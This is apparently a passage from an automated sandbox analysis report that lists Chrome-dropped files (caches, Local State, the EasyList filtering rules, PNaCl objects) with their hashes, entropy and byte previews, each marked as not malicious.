                                                                                                                                                                                Preview: .t..............*...C.:.\.P.R.O.G.R.A.~.1.\.M.I.C.R.O.S.~.1.\.O.f.f.i.c.e.1.6.\.G.R.O.O.V.E.E.X...D.L.L..P!...[)...%.p.r.o.g.r.a.m.f.i.l.e.s.%.\.m.i.c.r.o.s.o.f.t. .o.f.f.i.c.e.\.o.f.f.i.c.e.1.6.\.......g.r.o.o.v.e.e.x...d.l.l.....M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e. .2.0.1.6...*...M.i.c.r.o.s.o.f.t. .O.n.e.D.r.i.v.e. .f.o.r. .B.u.s.i.n.e.s.s. .E.x.t.e.n.s.i.o.n.s.....1.6...0...4.7.1.1...1.0.0.0.....*...C.:.\.P.R.O.G.R.A.~.1.\.M.I.C.R.O.S.~.1.\.O.f.f.i.c.e.1.6.\.G.R.O.O.V.E.E.X...D.L.L.....M.i.c.r.o.s.o.f.t. .C.o.r.p.o.r.a.t.i.o.n...aI8.D...C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.C.o.m.m.o.n. .F.i.l.e.s.\.M.i.c.r.o.s.o.f.t. .S.h.a.r.e.d.\.O.F.F.I.C.E.1.6.\.m.s.o.s.h.e.x.t...d.l.l..@.....U/...%.c.o.m.m.o.n.p.r.o.g.r.a.m.f.i.l.e.s.%.\.m.i.c.r.o.s.o.f.t. .s.h.a.r.e.d.\.o.f.f.i.c.e.1.6.\.......m.s.o.s.h.e.x.t...d.l.l.....M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e.)...M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e. .S.h.e.l.l. .E.x.t.e.n.s.i.o.n. .H.a.n.d.l.e.r.s.......1.6...0...4.2.6.6...1.0.0.1.....D...C.:.\.P.r.o.g.r.a.m.
                                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Module Info Cachehu (copy)
                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                File Type:SysEx File -
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):94708
                                                                                                                                                                                Entropy (8bit):3.7429408286243255
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:384:9nelNToibAz7VU6poNJrCvNX3mpniHzeGatrYLxNxm3fj+r8dmsPoHZJxmOTD5N5:9a2xVKbCaQeLxXboH72TKVbBJZ
                                                                                                                                                                                MD5:CD7BC45E6348892032B8B2141DEA7457
                                                                                                                                                                                SHA1:C9EE8694B26A114EA1AEC1E82B00FE6E05AA10F3
                                                                                                                                                                                SHA-256:CA42834CEE090D52DDDB01B3FCE5E26E77BAA6399706057FF1DD44CB7A44634B
                                                                                                                                                                                SHA-512:00E2DEE63C1C8AC1DF32D61D62CC39F373DD1CD02C5AC191BC5A1D6F22D0DB44034D6FC47A6100B70799E247D2A061A4A6AC28BBE6CDE23195098A9FD3C98367
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Preview: .q..............*...C.:.\.P.R.O.G.R.A.~.1.\.M.I.C.R.O.S.~.1.\.O.f.f.i.c.e.1.6.\.G.R.O.O.V.E.E.X...D.L.L..P!...[)...%.p.r.o.g.r.a.m.f.i.l.e.s.%.\.m.i.c.r.o.s.o.f.t. .o.f.f.i.c.e.\.o.f.f.i.c.e.1.6.\.......g.r.o.o.v.e.e.x...d.l.l.....M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e. .2.0.1.6...*...M.i.c.r.o.s.o.f.t. .O.n.e.D.r.i.v.e. .f.o.r. .B.u.s.i.n.e.s.s. .E.x.t.e.n.s.i.o.n.s.....1.6...0...4.7.1.1...1.0.0.0.....*...C.:.\.P.R.O.G.R.A.~.1.\.M.I.C.R.O.S.~.1.\.O.f.f.i.c.e.1.6.\.G.R.O.O.V.E.E.X...D.L.L.....M.i.c.r.o.s.o.f.t. .C.o.r.p.o.r.a.t.i.o.n...aI8.D...C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.C.o.m.m.o.n. .F.i.l.e.s.\.M.i.c.r.o.s.o.f.t. .S.h.a.r.e.d.\.O.F.F.I.C.E.1.6.\.m.s.o.s.h.e.x.t...d.l.l..@.....U/...%.c.o.m.m.o.n.p.r.o.g.r.a.m.f.i.l.e.s.%.\.m.i.c.r.o.s.o.f.t. .s.h.a.r.e.d.\.o.f.f.i.c.e.1.6.\.......m.s.o.s.h.e.x.t...d.l.l.....M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e.)...M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e. .S.h.e.l.l. .E.x.t.e.n.s.i.o.n. .H.a.n.d.l.e.r.s.......1.6...0...4.2.6.6...1.0.0.1.....D...C.:.\.P.r.o.g.r.a.m.
                                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\ShaderCache\GPUCache\data_1
                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                File Type:data
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):270336
                                                                                                                                                                                Entropy (8bit):0.0018238520723782249
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:3:MsEllllkEthXllkl2zEflIg/:/M/xT02zpg
                                                                                                                                                                                MD5:F49CF10A30EF504A5211B81C3895A7EE
                                                                                                                                                                                SHA1:DCC0E9D4A0634E7403F32F5EA03F55479569ED0B
                                                                                                                                                                                SHA-256:DA1B57E338DD8060D49F4AEA3B69CB28A75ABC4D41D47AB80EE350FA00CC5087
                                                                                                                                                                                SHA-512:F2EE097FA113FD6D0DB5A77CE85C49BD727933B678C37A700691F8CA3C6EC1321666AC2FFCA1EB858A46DF98858BC11B25CFD87938B871726579F5FBE6DA0900
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\b761f51d-f953-4789-8e23-83a28d7baf61.tmp
                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):177280
                                                                                                                                                                                Entropy (8bit):6.047298026045306
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:3072:2YJVdrQb+8ktzqbVehdMai2IO8evnQ16rYOFcbXafIB0u1GOJmA3iuRl:rrd0hqhdMNnOvBraqfIlUOoSiuRl
                                                                                                                                                                                MD5:D35B3B894F1688787C696F6BFAACFA58
                                                                                                                                                                                SHA1:58CB801EA2F8186789D492DE537652EEC66AB38C
                                                                                                                                                                                SHA-256:9B6A972FAEB7F8960944BC1974A5B98CDC3E71066C85E72C7EB998CD43285040
                                                                                                                                                                                SHA-512:89A2E2B291139B6389804ACF542AF53979F1EA105BBA91589CFAB6A0B0B28F2FEB0E6FA35E27EF0EBCFACB38F8BE820D48733F478EAF17B9EA2E0234367A01CC
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Preview: {"browser":{"last_redirect_origin":"","shortcut_migration_version":"85.0.4183.121"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"hardware_acceleration_mode_previous":true,"intl":{"app_locale":"en"},"legacy":{"profile":{"name":{"migrated":true}}},"network_time":{"network_time_mapping":{"local":1.635211041003527e+12,"network":1.635178642e+12,"ticks":134016694.0,"uncertainty":3778021.0}},"os_crypt":{"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAABL95WKt94zTZq03WydzHLcAAAAAAIAAAAAABBmAAAAAQAAIAAAABAL2tyan+lsWtxhoUVdUYrYiwg8iJkppNr2ZbBFie9UAAAAAA6AAAAAAgAAIAAAABDv4gjLq1dOS7lkRG21YVXojnHhsRhNbP8/D1zs78mXMAAAAB045Od5v4BxiFP4bdRYJjDXn4W2fxYqQj2xfYeAnS1vCL4JXAsdfljw4oXIE4R7l0AAAABlt36FqChftM9b7EtaPw98XRX5Y944rq1WsGWcOPFyXOajfBL3GXBUhMXghJbDGb5WCu+JEdxaxLLxaYPp4zeP"},"password_manager":{"os_password_blank":true,"os_password_last_changed":"13276832799728044"},"plugins":{"metadata":{"adobe-flash-player":{"disp
                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\0f5b4f53-8787-44d3-99e2-c97aa416247e.tmp
                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                File Type:Google Chrome extension, version 3
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):768843
                                                                                                                                                                                Entropy (8bit):7.992932603402907
                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                SSDEEP:12288:cK2ED9wjXNC1Gse83ru82/u0eKhgxuPFrDXgtbPz54Pm1D0fBmfH1sBrJ9mTiDga:cK2ED9I48seur0/uZKCuPNbgtbz6m1ob
                                                                                                                                                                                MD5:A11D5CAF6BF849AEB84B0C95B1C3B7CF
                                                                                                                                                                                SHA1:27F410CCBD75852C01C7464A1FD7EF8C29BE3916
                                                                                                                                                                                SHA-256:D0E62ACE64AFC334330A7AC3A2CC657914FEB321F1F89AEE11D2A6D0E7D81C31
                                                                                                                                                                                SHA-512:086C124DE3A01BE467647F3BCB4EA05105F690AB45417A0E3D38935ABA9E2381DF59AF98D0FFF7823CEFD5390B48807352E135AC70977AED7B413A8CC48FB590
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Preview: Cr24..............0.."0...*.H.............0...........\7c.<........Fto.8.2'5..qk...%....2...C.F.9.#..e.xQ.......[...L|....3>/....u.:T.7...(.yM...?V.<?........1.a...O?d.....A.H..'.MpB..T.m..Vn Ip..>k.|1..n.<Fb..f..*Q1.....s..2..{*.6....Pp....obM..1.......b1.......(.u^.'z......v.F.W.X4."-*eu...b.........6W..>Nuw9..R{c...Nq.H.K..A!....`v.k+..?.5.>v.....;.._~....tp....x.q.V...7.m.O.~.{!.o/q.'..BK..4./?'.....L..fH&.._<..&.p.k^..\s...:1y..F.N.+...X.PO@Mo....X.G1:..Y.@;..j..........=ae...0.......DU....n...n.;.Ipr..Q....:... <.....a.Y....{ei........0..0...*.H............0.......Mbh=.[O}.+..U.KHF(n3.\"...,g.c...6)..(.E...U...#.i.a..:...N.....P...x.O...(mC;|.5.S.{m.aEx...[..fP.i`.y..5..R....v.$......l-m.............m....ni...`..W.....R.p.b.+...+.\k.R$e~.J\.&c%.d...M..j..V.%...+1F....D....X\.1ct.<........E.B.+.i@...8..^...&YR...I.o...,.....[0Y0...*.H.=....*.H.=....B..............r...2..+Y.I...k..bR.j5Sl..8.......H"i.-l..`.Q.{...F0D. D.'.N@.(..GK....m...A.0.."
                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\471a6a1f-e48d-4e8e-ba7a-8600b34f5682.tmp
                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                File Type:very short file (no magic)
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):1
                                                                                                                                                                                Entropy (8bit):0.0
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:3:L:L
                                                                                                                                                                                MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Preview: .
                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\5800_1657799366\Filtering Rules
                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                File Type:data
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):91662
                                                                                                                                                                                Entropy (8bit):5.445218573812661
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:1536:dP10tSrXGbnSboNUeJvnp6591jYFmwN6DokKwA38:P0tRbnHKmh6pjYowgD1+8
                                                                                                                                                                                MD5:1B20DD5F6D92AC4EA703F7DD8654B2D2
                                                                                                                                                                                SHA1:C4F9C3301C59AFD213DDE0D6B450ACEA4BE1E282
                                                                                                                                                                                SHA-256:041E9E35F6BDA335B925AC90CEC7C565F823E8B6B362584B2EB56DA955F17FDE
                                                                                                                                                                                SHA-512:ECE136D4D9AADB3E9683CCD6144D8AEBDC1A5A686C3DD92C53BBCCCDF0588B8C519F24618CF0249A9405DB9F35E06CE45B5FD23202CB9C8D8F8C20977168D26B
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Preview: ..........o0.8.@.R.-728x90.........o0.8.@.R.adtdp.com^.........o*...epaper.timesgroup.com*...nbcsports.com*...windalert.com*...kowb1290.com*...k2radio.com*...vimeo.com*...koel.com*...uefa.com0.8.@.R#googletagservices.com/tag/js/gpt.js........o0.8.@.R./ad-inserter/.+......0.8.@.R.g.ezoic.net/ezosuigenerisc.js.9......o*...adcore.com.au..*...adcore.ch..0.8.@.R./adcore_........o0.8.@.R.uwoaptee.com^........o0.8.@.R.ayads.co^........o0.8.@.R._468_60..8......o0.8.@.R)bancodevenezuela.com/imagenes/publicidad/........o0.8.@.R..adbutler-........o0.8.@.R.adrecover.com^.>......o*...google.com0.8.@.R!developers.google.com/google-ads/........o0.8.@.R.aso1.net^.-......o*...vk.com0.8.@.R.vk.me/css/al/ads.css.+......o0.8.@.R.mysmth.net/nForum/*/ADAgent_.%......0.8.@.R.discordapp.com/banners/.D......o*...daum.net0.8.@.R)daumcdn.net/adfit/static/ad-native.min.js.'......o0.8.@.R.looker.com/api/internal/."......o0.8.@.R.broadstreetads.com^........o0.8.@.R./banner.cgi?.........o*...thefreedictionary.com*..
                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\5800_1657799366\LICENSE.txt
                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):24623
                                                                                                                                                                                Entropy (8bit):4.588307081140814
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:384:mva5sf5dXrCN7tnBxpxkepTqzazijFgZk231Py9zD6WApYbm0:mvagXreRnTqzazWgj0v6XqD
                                                                                                                                                                                MD5:D33AAA5246E1CE0A94FA15BA0C407AE2
                                                                                                                                                                                SHA1:11D197ACB61361657D638154A9416DC3249EC9FB
                                                                                                                                                                                SHA-256:1D4FF95CE9C6E21FE4A4FF3B41E7A0DF88638DD449D909A7B46974D3DFAB7311
                                                                                                                                                                                SHA-512:98B1B12FF0991FD7A5612141F83F69B86BC5A89DD62FC472EE5971817B7BBB612A034C746C2D81AE58FDF6873129256A89AA8BB7456022246DC4515BAAE2454B
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Preview: EasyList Repository Licences.... Unless otherwise noted, the contents of the EasyList repository.. (https://github.com/easylist) is dual licensed under the GNU General.. Public License version 3 of the License, or (at your option) any later.. version, and Creative Commons Attribution-ShareAlike 3.0 Unported, or.. (at your option) any later version. You may use and/or modify the files.. as permitted by either licence; if required, "The EasyList authors.. (https://easylist.to/)" should be attributed as the source of the.. material. All relevant licence files are included in the repository..... Please be aware that files hosted externally and referenced in the.. repository, including but not limited to subscriptions other than.. EasyList, EasyPrivacy, EasyList Germany and EasyList Italy, may be.. available under other conditions; permission must be granted by the.. respective copyright holders to authorise the use of their material.......Creative Commons Attribut
                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\5800_1657799366\_metadata\verified_contents.json
                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):1529
                                                                                                                                                                                Entropy (8bit):5.982586926845733
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:24:pZRj/flTHYYG6CkYbKWvgjeT3SzkaoXs3secwzXITLm7oXN68gdu8v22LWmZ:p/h4d5bKETCkaknTwrD7kw8AuL2LWg
                                                                                                                                                                                MD5:6ABC3D5978FB1923B01B724C9BF650FE
                                                                                                                                                                                SHA1:4B7885693DF9971A4C8908FF36AEB8C8AEFA35BF
                                                                                                                                                                                SHA-256:61997A1114C0BFC1AE793D5BBE59BFA35C32AF28072E6B2F46E360490CD7402B
                                                                                                                                                                                SHA-512:20C38E7DB25C9FCB9122092632C714B3A52A4CB4AC6D8B88F6F162302C28090D7278FFA4A20697B247FC1329D69648F41C78D3E7353A63190EC109792265C2F1
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Preview: [{"description":"treehash per file","signed_content":{"payload":"eyJjb250ZW50X2hhc2hlcyI6W3siYmxvY2tfc2l6ZSI6NDA5NiwiZGlnZXN0Ijoic2hhMjU2IiwiZmlsZXMiOlt7InBhdGgiOiJGaWx0ZXJpbmcgUnVsZXMiLCJyb290X2hhc2giOiJvVmpUZ0dCOXh1NUZvdy1YOHBMSUd3N3c3bzRtWHBRU2lSMVB5U2ZFUG1zIn0seyJwYXRoIjoiTElDRU5TRS50eHQiLCJyb290X2hhc2giOiIyaWswNmk0TFlCdVNHNWphRGFIS253NE9pdnVSRzZsQ0JKMVk0TGtzRFJJIn0seyJwYXRoIjoibWFuaWZlc3QuanNvbiIsInJvb3RfaGFzaCI6IlpPazM1MWhHSnhHdFdwNXI1SUVyc2RLRTF4WVE2QmlrcDUydnI1ZDhaZ2cifV0sImZvcm1hdCI6InRyZWVoYXNoIiwiaGFzaF9ibG9ja19zaXplIjo0MDk2fV0sIml0ZW1faWQiOiJnY21qa21nZGxnbmtrY29jbW9laW1pbmFpam1tam5paSIsIml0ZW1fdmVyc2lvbiI6IjkuMzAuMCIsInByb3RvY29sX3ZlcnNpb24iOjF9","signatures":[{"header":{"kid":"publisher"},"protected":"eyJhbGciOiJSUzI1NiJ9","signature":"Y3LhZVwztDSZ5AuBNgXe7VKETu2kD6_AcJaojgZVhFD8942owYRMUcn7zbIdpWAI63bX0GC1iT6hMNiDgSxPunZep3sHvuizqznjZYwkXT16Ej2z5iRb_CwkZO73VXN1GELnCYS8Aj0Wz5jsAdqxfh0zy_36dH6Kekv6cJs-uAmWvimsX__rmkef76WxK22qGG0vA5vjIrlvez8tQ4ZUKJCVSdvE7yxupPcnTKrSRHemFyCLQ
                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\5800_1657799366\manifest.json
                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):115
                                                                                                                                                                                Entropy (8bit):4.545910352797257
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:3:rR6TAulhFphifFHXG7LGMdv5HcDKhtUJKS1Gv:F6VlMZWuMt5SKPS1Gv
                                                                                                                                                                                MD5:9826ADA46C629E7D0233C6079456A4DA
                                                                                                                                                                                SHA1:CCAFC047ABB6DF35A1EB262CDF274DE747DFB598
                                                                                                                                                                                SHA-256:64E937E758462711AD5A9E6BE4812BB1D284D71610E818A4A79DAFAF977C6608
                                                                                                                                                                                SHA-512:8BA91A6DB13D7D8C5EA66E2403AE9722CEBDD6B15E8F8522374E980CE9C3DEBB1C508BB33FAC94D87CA58A5E4C7201DB0FBCA034E840E33A23A2D48F091BCAC9
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Preview: {. "manifest_version": 2,. "name": "Subresource Filtering Rules",. "ruleset_format": 1,. "version": "9.30.0".}.
                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\5800_1946143775\_metadata\verified_contents.json
                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):3034
                                                                                                                                                                                Entropy (8bit):5.876664552417901
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:48:p/hEc9q0S+UTKYM43z8nqMsfWRUWEADM/W9n7lqFkakzcVTGkcYTPi6zM:RGcg5z/jjjHgUnV278+aWLy4
                                                                                                                                                                                MD5:8B6C3E16DFBF5FD1C9AC2267801DB38E
                                                                                                                                                                                SHA1:F5CADC5914DF858C96C189B092BC89C29407BBAA
                                                                                                                                                                                SHA-256:FD986A547D9585E98F451B87CA85DEB4B61EE540C6FAC678D7BEDABF04653095
                                                                                                                                                                                SHA-512:37048EF8FADF62A26CAEC6EE90AC192429AB1E99424E5C68FACA90C0DAD68642C761FDCAC03FC38FA930841F91FA145A6943EC7F168D4F2FA426F1F092C2F502
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Preview: [{"description":"treehash per file","signed_content":{"payload":"eyJjb250ZW50X2hhc2hlcyI6W3siYmxvY2tfc2l6ZSI6NDA5NiwiZGlnZXN0Ijoic2hhMjU2IiwiZmlsZXMiOlt7InBhdGgiOiJfcGxhdGZvcm1fc3BlY2lmaWMveDg2XzY0L3BuYWNsX3B1YmxpY19wbmFjbF9qc29uIiwicm9vdF9oYXNoIjoiVkNUSHNJVHNUSXVncWNhV2ctWHVpTU1sdWloV1FSTE1sQnpTTGprdGhETSJ9LHsicGF0aCI6Il9wbGF0Zm9ybV9zcGVjaWZpYy94ODZfNjQvcG5hY2xfcHVibGljX3g4Nl82NF9jcnRiZWdpbl9mb3JfZWhfbyIsInJvb3RfaGFzaCI6ImxINWt2a1BvSVZZczZKVHhyOHc5Q2MxXzloVEJCX3lVSlF6VDZseVVNd0kifSx7InBhdGgiOiJfcGxhdGZvcm1fc3BlY2lmaWMveDg2XzY0L3BuYWNsX3B1YmxpY194ODZfNjRfY3J0YmVnaW5fbyIsInJvb3RfaGFzaCI6IkVuLVFQTW1HUm1xbG9Ud1gzOTAzckpsMkw0R25sQmdET1FhZlNKaHJ4Nk0ifSx7InBhdGgiOiJfcGxhdGZvcm1fc3BlY2lmaWMveDg2XzY0L3BuYWNsX3B1YmxpY194ODZfNjRfY3J0ZW5kX28iLCJyb290X2hhc2giOiJkT2lJVzRmdEdGNW9FY0k1UXYyYjBmdXNrUlYyaUVtdmxhbmV6MlpFc3VvIn0seyJwYXRoIjoiX3BsYXRmb3JtX3NwZWNpZmljL3g4Nl82NC9wbmFjbF9wdWJsaWNfeDg2XzY0X2xkX25leGUiLCJyb290X2hhc2giOiIzNEU5QU9EMmpqLWNoMzZQZ0NVV0YtMUpYWVhVdlNGY1I4bks1aWppcWNjIn0seyJwYXRoIjoiX3B
                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\5800_1946143775\_platform_specific\x86_64\pnacl_public_pnacl_json
                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):507
                                                                                                                                                                                Entropy (8bit):4.68252584617246
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:12:TjLJ7qaVgPPd8bdzQBXefosmc5T9+n6e1Cetm1JXcAwA:TJ7jViPOd8wfHmZ6RP15
                                                                                                                                                                                MD5:35D5F285F255682477F4C50E93299146
                                                                                                                                                                                SHA1:FB58813C4D785412F05962CD379434669DE79C2B
                                                                                                                                                                                SHA-256:5424C7B084EC4C8BA0A9C69683E5EE88C325BA28564112CC941CD22E392D8433
                                                                                                                                                                                SHA-512:59DF2D5F2684FACC80C72F9C4B7E280F705776076C9D843534F772D5A3D578BEE04289AEE81320F23FB4D743F3969EDF5BA53FEBBAC8A4D27F3BC53BCF271C3E
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Preview: {. "COMMENT": [. "This file serves as a template for the resource info description used by ", . "the NaCl Chrome plugin. It is kept in the NaCl repository to prevent ", . "hard-coding of NaCl-specific information inside the Chrome repository.". ], . "abi-version": 1, . "pnacl-arch": "x86-64", . "pnacl-ld-name": "ld.nexe", . "pnacl-llc-name": "pnacl-llc.nexe", . "pnacl-sz-name": "pnacl-sz.nexe", . "pnacl-version": "5dfe030a71ca66e72c5719ef5034c2ed24706c43".}
                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\5800_1946143775\_platform_specific\x86_64\pnacl_public_x86_64_crtbegin_for_eh_o
                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                File Type:ELF 64-bit LSB relocatable, x86-64, version 1 (SYSV), not stripped
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):2712
                                                                                                                                                                                Entropy (8bit):3.4025803725190906
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:48:b/5D5V5PK82aTS6aTTw0Do1DttoyDNsEA:b/hbVic1ZtLDNsE
                                                                                                                                                                                MD5:604FF8F351A88E7A1DBD7C836378AE86
                                                                                                                                                                                SHA1:9D8D89AE9F13D6306E619A4EAAD51EDE91A5F9F3
                                                                                                                                                                                SHA-256:947E64BE43E821562CE894F1AFCC3D09CD7FF614C107FC94250CD3EA5C943302
                                                                                                                                                                                SHA-512:85B1EDA4C473E00034EE627B7ABB894A77E521BC6A91A91A4A3744CA7511CB0AF10B9723D9ECC2CE3378DD70B659DF842D8C11875958CB77070CF01EC0A15840
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Preview: .ELF..............>.................................@.....@.......................................PH.......,$J.l=....J.$<A[..@.A...M..A..ffffff..................PH......,$J.l=....J.$<A[..D..A...M..A..ffffff..................PH..1..,$J.l=....J.$<A[.......A...M..A..ffffff..................PH..SP..h.........fff...................h.........fff.............J.$<[.,$J.l=....J.$<.....f.....................................................................................................................................................................................NaCl....x86-64...........zR..x......................@....C....C.........8.......@....C....C.........T.......@....C....C.........p.......`....C....C..B...... .......................<...............@.......X.......................t........................clang version 3.7.0 (https://chromium.googlesource.com/a/native_client/pnacl-clang.git ce163fdd0f16b4481e5cf77a16d45e9b4dc8300e) (https://chromium.googlesource.com/a/native_client/pna
                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\5800_1946143775\_platform_specific\x86_64\pnacl_public_x86_64_crtbegin_o
                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                File Type:ELF 64-bit LSB relocatable, x86-64, version 1 (SYSV), not stripped
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):2776
                                                                                                                                                                                Entropy (8bit):3.5335802354066246
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:48:b/5D5V5ej5ej5PjDdaTS6aTTw6DV1DtFouoyDOsTy:b/hbEEVJB1ZFhLDOsT
                                                                                                                                                                                MD5:88C08CD63DE9EA244F70BFC53BBCADF6
                                                                                                                                                                                SHA1:8F38A113A66B18BAA02E2C995099CF1145A29DAA
                                                                                                                                                                                SHA-256:127F903CC986466AA5A13C17DFDD37AC99762F81A794180339069F48986BC7A3
                                                                                                                                                                                SHA-512:78D2500493A65A23D101EC2420DC5F0CE8C75EFAC425C28547121643E4FB568E9D827EF2C0F7068159E043C86B986F29BF92C6BADC675F160B63C7B3512EB95F
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Preview: .ELF..............>.....................X...........@.....@.......................................PH.......,$J.l=....J.$<A[..@.A...M..A..ffffff..................PH......,$J.l=....J.$<A[..D..A...M..A..ffffff..................PH..1..,$J.l=....J.$<A[.......A...M..A..ffffff..................PH..,$J.l=....J.$<A[f........A...M..A..ffffff..................PH..,$J.l=....J.$<A[f........A...M..A..ffffff..................PH..SP..h.........fff.............J.$<[.,$J.l=....J.$<.....f.K...............`.......P.......................z...................................NaCl....x86-64...clang version 3.7.0 (https://chromium.googlesource.com/a/native_client/pnacl-clang.git ce163fdd0f16b4481e5cf77a16d45e9b4dc8300e) (https://chromium.googlesource.com/a/native_client/pnacl-llvm.git 7251d5b59fca15195c94a3a7da70f0081724448f)............zR..x......................@....C....C.........8.......@....C....C.........T.......@....C....C.........p.......@....C....C.................@....C....C.................@...
                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\5800_1946143775\_platform_specific\x86_64\pnacl_public_x86_64_crtend_o
                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                File Type:ELF 64-bit LSB relocatable, x86-64, version 1 (SYSV), not stripped
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):1520
                                                                                                                                                                                Entropy (8bit):2.799960074375893
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:12:Bvx/ekjlM/NQQmTfR9yp9396QQmTfR9C6wRqD8MTDDw7lEOkSbfuEAXwX6BX2U8b:bDjO/NbmT3296bmT3Twk8qDwh7b7CD8
                                                                                                                                                                                MD5:75E79F5DB777862140B04CC6861C84A7
